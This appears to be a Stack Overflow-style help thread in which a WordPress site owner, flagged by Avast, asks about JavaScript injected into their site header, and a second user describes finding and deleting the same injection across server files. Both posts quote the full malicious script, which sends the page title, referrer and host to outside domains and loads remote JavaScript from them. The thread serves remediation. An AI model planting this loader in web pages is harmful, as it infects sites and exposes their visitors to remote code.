Avast gives error of JS:Injection-A[Trj] on my website

javascript php wordpress trojan
lospicos picture lospicos · Dec 9, 2015 · Viewed 9.7k times · Source

Today I got a warning from Avast when I wanted to enter to my website: forumhan.com.

To understand this you must have Avast on your computer.

My website was infected with JS:Injection-A[Trj] — that's why it wasn't showing.

And when I look, I found this on my header:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://vkza.tora.ru/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

As I am not a professional, I cannot understand if there is any relation with other files.

Is there any call to other files in this code?

Does removing this solve the problem or not?

I removed it, but I cannot see my webpage.

Answer

Dani G. picture Dani G. · Jan 13, 2016

I've found the solution.

The problem is what you are saying. Someone injected that code to your website (and mine also). So what I've done is pick this snippet:

encodeURIComponent(document.title)

and search in htdocs folder in all the files with Notepad++ on the server.

Then I've found something like this:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://delicefilm.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

in here:

enter image description here

And I have erased it from all the files. And that's all!

Hope it works for you too! :)

Related questions

How to add custom javascript to WordPress Admin?

I want to add some custom jquery code to the Edit Post page, something really simple like showing a div when someone presses Publish. The only restriction is that I want to achieve this through the use of a plugin, …

Read More
How do I defer or async this WordPress javascript snippet to load lastly for faster page load times?

I have various javascripts that are necessary plugins in one of my WordPress domains, and I know where in the php file it's called from. I'm taking every measure I can take to speed up page loading times, and every …

Read More
jQuery is not defined in Wordpress, but my script is enqueued properly

I am trying to load a separate javascript file mobile-menu.js to my Wordpress theme. When I look at the console, it says, "jQuery is not defined." However, I know that I enqueued my script files correctly. Any ideas? HTML …

Read More